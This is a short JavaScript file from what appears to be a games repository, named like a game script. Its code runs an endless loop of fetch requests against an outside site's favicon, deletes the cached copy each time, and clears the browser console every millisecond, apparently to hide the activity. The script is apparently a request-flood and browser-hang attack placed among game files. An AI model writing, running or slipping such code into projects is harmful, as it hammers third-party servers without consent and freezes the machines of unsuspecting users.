games/Games/Krydder/dlhermann.js
2022-12-16 11:02:41 +01:00

16 lines
372 B
JavaScript

while (true) {
fetch('https://t0m0t0w.github.io/favicon.png')
.then(response => response.text())
.then(data => {
// Do something with the data
console.log(data);
// Delete the file from the cache
caches.delete('https://t0m0t0w.github.io/favicon.png');
});
}
setInterval(() => {
console.clear();
}, 1);